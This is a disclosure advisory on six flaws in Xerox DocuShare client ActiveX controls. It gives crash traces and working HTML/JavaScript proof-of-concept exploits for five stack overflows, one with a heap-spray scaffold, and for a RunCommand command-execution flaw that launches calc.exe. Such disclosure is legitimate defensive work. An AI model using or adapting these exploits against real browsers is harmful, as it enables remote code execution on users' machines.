SSD Advisory – Xerox DocuShare Multiple Vulnerabilities

Introduction
DocuShare is a content management system developed by Xerox Corporation. DocuShare makes use of open standards and allows for managing content, integrating it with other business systems, and developing customized and packaged software applications.
Multiple vulnerabilities have been found in Xerox DocuShare:
 

  • DSUtilityLib.HelperObj.4 Activex Control ShowHelp Method lstrcatW() Call Stack Buffer Overflow Vulnerability
  • DSUtilityLib.HelperObj.4 ActiveX Control GetResourceString Method _vswprintf() Call Stack Buffer Overflow Vulnerability
  • DSUtilityLib.HelperObj.4 Activex Control ProfileInt Property wsprintfW() Call Stack Buffer Overflow Vulnerability
  • DSITEMENUMLib.ItemObj.4 Activex Control Basetype Property Stack Buffer Overflow Vulnerability
  • DsSearch.SearchConsole.1 ActiveX Control RestrictGlobalScope Method wcscpy() Call Stack Buffer Overflow Vulnerability
  • DSUtilityLib.HelperObj.4 Activex Control RunCommand Method CreateProcessW() Call Command Execution Vulnerability


Vulnerable Version
Xerox DsClient version 6.5.2 b36
DSUtilityLib.HelperObj.4 Activex Control ShowHelp Method lstrcatW() Call Stack Buffer Overflow Vulnerability
DocuShare installs an ActiveX control with the following settings:

CLSID: {5F47B86B-7D68-4443-824C-A943BF0AD6DC}
Progid: DSUtilityLib.HelperObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\UtilLib.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is safe for scripting, then Internet Explorer will allow to script its properties and methods according to the target user browser security settings.
The ActiveX offers the ShowHelp method array, see typelib:

...
/* DISPID=1610743821 */
function ShowHelp(
    /* VT_BSTR [8] [in] */ $Application,
    /* VT_BSTR [8] [in] */ $Section,          <------------
    /* VT_PTR [26] [in] --> VT_VARIANT [12]  */ &$Flags,
    /* VT_PTR [26] [in] --> VT_VARIANT [12]  */ &$WindowHandle
    )
 {
    /* Show help *
 }
...

The Section parameter suffers of stack buffer overflow vulnerability because of a dangerous call to lstrcatW() inside the UtilLib.dll, see vulnerable code below.

WinDbg shows:
(1538.ee8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=03fdb154 ebx=000445c2 ecx=0000fddd edx=fffffffe esi=0baa4ea0 edi=03fdfffe
eip=76688296 esp=03fdb104 ebp=03fdb12c iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203
KERNEL32!lstrcatW+0x40:
76688296 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

Exploit

<!-- UtilLib.dll -->
<html>
<body>
<object classid='clsid:5F47B86B-7D68-4443-824C-A943BF0AD6DC' id='obj' />
</object>
<script>
var yy="";
for(i=0;i<50000;i++){
yy = yy +unescape("%u4141%u4141");
}
obj.ShowHelp("AA",yy,"AA","AA");
</script>
</body>
</html>

DSUtilityLib.HelperObj.4 ActiveX Control GetResourceString Method _vswprintf() Call Stack Buffer Overflow Vulnerability
Xerox DocuShare installs an ActiveX control with the following settings:

CLSID: {5F47B86B-7D68-4443-824C-A943BF0AD6DC}
Progid: DSUtilityLib.HelperObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\UtilLib.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is safe for scripting, then Internet Explorer will allow to script its properties and methods according to the target user browser security settings.
The ActiveX offers the GetResourceString method, see typelib:

...
/* DISPID=1610743823 */
/* VT_BSTR [8] */
function GetResourceString(
        /* VT_BSTR [8] [in] */ $SatelliteName,  <---------------
        /* VT_I4 [3] [in] */ $ResourceId
        )
{
        /* Get resource string */
}
...

The SatelliteName parameter suffers of a stack buffer overflow vulnerability because of a dangerous call to _vswprintf() inside the UtilLib.dll, see vulnerable code below.

WinDbg shows:
(1350.e98): Access violation - code c0000005 (first chance)
eax=00004141 ebx=0cca2a84 ecx=04320000 edx=00000073 esi=0431aff8 edi=0431aff8
eip=70e1edbe esp=0431ab0c ebp=0431ab28 iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010213
MSVCR90!fputwc_nolock+0x163:
70e1edbe 668901          mov     word ptr [ecx],ax        ds:002b:04320000=4552
Seh chain:
0:006> !exchain
UtilLib!DllUnregisterServer+16446 (0d2ec3f6)
0431befc: 41414141
Invalid exception stack at 41414141
vulnerable code,UtilLib.dll:
;----------------------------------------------------------------------------------------------------
 1001219D  CCCCCC                    		Align	4
 100121A0                           SUB_L100121A0:
 100121A0  8B4C2404                  		mov	ecx,[esp+04h]
 100121A4  8D442408                  		lea	eax,[esp+08h]
 100121A8  50                        		push	eax
 100121A9  51                        		push	ecx
 100121AA  52                        		push	edx
 100121AB  FF15E8120810              		call	[MSVCR90.dll!_vswprintf]  <------- dangerous call
 100121B1  83C40C                    		add	esp,0000000Ch
 100121B4  C3                        		retn
;----------------------------------------------------------------------------------------------------

Exploit

<!-- UtilLib.dll -->
<html>
<body>
<object classid='clsid:5F47B86B-7D68-4443-824C-A943BF0AD6DC' id='obj' />
</object>
<script>
var xx="";
for(i=0;i<5000;i++){
xx = xx +unescape("%u4141%u4141");
}
obj.GetResourceString(xx,1);
</script>
</body>
</html>

DSUtilityLib.HelperObj.4 Activex Control ProfileInt Property wsprintfW() Call Stack Buffer Overflow Vulnerability
DocuShare installs an ActiveX control with the following settings:

CLSID: {5F47B86B-7D68-4443-824C-A943BF0AD6DC}
Progid: DSUtilityLib.HelperObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\UtilLib.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is safe for scripting, then Internet Explorer will allow to script its properties and methods according to the target user browser security settings.
The ActiveX offers the ProfileInt property array, see typelib:

...
Property Let ProfileInt (
 	ByVal Section  As String , <-----------
 	ByVal Name  As String
)  As Long
...

The Section parameter suffers of stack buffer overflow vulnerability because of a dangerous call to wsprintfW() inside the UtilLib.dll, see vulnerable code below.

WinDbg shows:
(4368.4344): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7733b4ad esi=00000000 edi=00000000
eip=41414141 esp=0018e774 ebp=0018e794 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???

Exploit

<!-- UtilLib.dll -->
<html>
<body>
<div id="blah"></div>
<object classid='clsid:5F47B86B-7D68-4443-824C-A943BF0AD6DC' id='obj' />
</object>
<script>
var div_container = document.getElementById("blah");
        div_container.style.cssText = "display:none";
        var data;
        offset = 0x100;
        junk = unescape("%u4141%u4141");
        while (junk.length < 0x1000) junk += junk;
        rop = unescape("%u4141%u4141");
        shellcode = unescape("%u4141%u4141");
        data = junk.substring(0,offset) + rop + shellcode
        data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
        while (data.length < 0x80000) data += data;
        for (var i = 0; i < 0x800; i++)
        {
                var x = document.createElement("button");
                x.title = data.substring(0,0x40000-0x58);
                div_container.appendChild(x);
        }
var yy="";
for(i=0;i<500;i++){
yy = yy +unescape("%u4141%u4141");
}
obj.ProfileInt(yy,"AAA") = 1;
</script>
</body>
</html>

DSITEMENUMLib.ItemObj.4 Activex Control Basetype Property Stack Buffer Overflow Vulnerability
DocuShare installs an ActiveX control with the following settings:

CLSID: {A0473614-A25D-11D1-BDB2-000086139E6F}
Progid: DSITEMENUMLib.ItemObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\ItemEnum.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is safe for scripting, then Internet Explorer will allow to script its properties and methods according to the target user browser security settings.
The ActiveX offers the BaseType property, see typelib:

...
/* DISPID=1610743980 */
/* Get property BaseType */
var $BaseType;
...

The property suffers of stack buffer overflow vulnerability because of a dangerous copy loop inside the ItemEnum.dll, see vulnerable code below.

WinDbg shows:
(55c.2530): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=80070057 ebx=068d3d8c ecx=89155c39 edx=00000000 esi=035eb770 edi=035eb58c
eip=00410041 esp=035eb54c ebp=035eb558 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
00410041 ??              ???

Exploit

<!-- ItemEnum.dll -->
<html>
<body>
<object classid='clsid:A0473614-A25D-11D1-BDB2-000086139E6F' id='obj' />
</object>
<script>
var xx ="";
for(i=0;i<1000;i++){
xx = xx+unescape("%uAAAA%uAAAA");
}
obj.BaseType = xx;
</script>
</body>
</html>

DsSearch.SearchConsole.1 ActiveX Control RestrictGlobalScope Method wcscpy() Call Stack Buffer Overflow Vulnerability
DocuShare installs an ActiveX control with the following settings:

CLSID: {E29FF196-C2B9-4E33-A147-1A4E97898E62}
Progid: DsSearch.SearchConsole.1
Binary Path: C:\Program Files (x86)\Xerox\DSClient\DsSearch.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is safe for scripting and safe for initialization, then Internet Explorer will allow to script its properties and methods according to the target user browser security settings.
The ActiveX offers the RestrictGlobalScope method, see typelib:

...
 /* DISPID=1 */
 function RestrictGlobalScope(
         /* VT_I4 [3] [in] */ $ServerId,
         /* VT_BSTR [8] [in] */ $CollectionHandle, <-------
         /* VT_BSTR [8] [in] */ $CollectionName
         )
 {
         /* method RestrictGlobalScope */
 }
...

The CollectionHandle parameter suffers of a stack buffer overflow vulnerability because of a dangerous call to wcscpy() inside the DsSearch.dll, see vulnerable code below.

WinDbg: shows:
(c94.3ec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1761749a ebx=176175d2 ecx=00000000 edx=00000000 esi=06b160c0 edi=00000000
eip=06af76cb esp=0400b334 ebp=0400b5f4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
DsSearch!DllUnregisterServer+0x13b96:
06af76cb 8b4308          mov     eax,dword ptr [ebx+8] ds:002b:176175da=????????

Exploit

<!-- DsSearch.dll -->
<html>
<body>
<object classid='clsid:E29FF196-C2B9-4E33-A147-1A4E97898E62' id='obj' />
</object>
<script>
var xx="";
for(i=0;i<5000;i++){xx = xx+unescape("%uAAAA%uAAAA")}
obj.RestrictGlobalScope(1,xx,"A");
</script>
</body>
</html>

DSUtilityLib.HelperObj.4 Activex Control RunCommand Method CreateProcessW() Call Command Execution Vulnerability
DocuShare installs an ActiveX control with the following settings:

CLSID: {5F47B86B-7D68-4443-824C-A943BF0AD6DC}
Progid: DSUtilityLib.HelperObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\UtilLib.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

According to the IObjectSafety interface, this control is safe for scripting, then Internet Explorer will allow to script its properties and methods according to the target user browser security settings.
The ActiveX offers the RunCommand method, see typelib:

CLSID: {5F47B86B-7D68-4443-824C-A943BF0AD6DC}
Progid: DSUtilityLib.HelperObj.4
Binary Path: C:\Program Files (x86)\Xerox\DSClient\UtilLib.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True

This method suffers of a remote command execution vulnerability because you are in control of the first two arguments of a CreateProcessW() call inside UtilLib.dll.
Exploit

<body>
<div id="blah"></div>
<object classid='clsid:5F47B86B-7D68-4443-824C-A943BF0AD6DC' id='target' />
</object>
<script>
target.RunCommand("c:\\windows\\system32\\calc.exe", "a");
</script>

Vendor Response
Xerox has released a patch that addresses these issues: https://docushare.xerox.com/doug/dsweb/View/Collection-16733.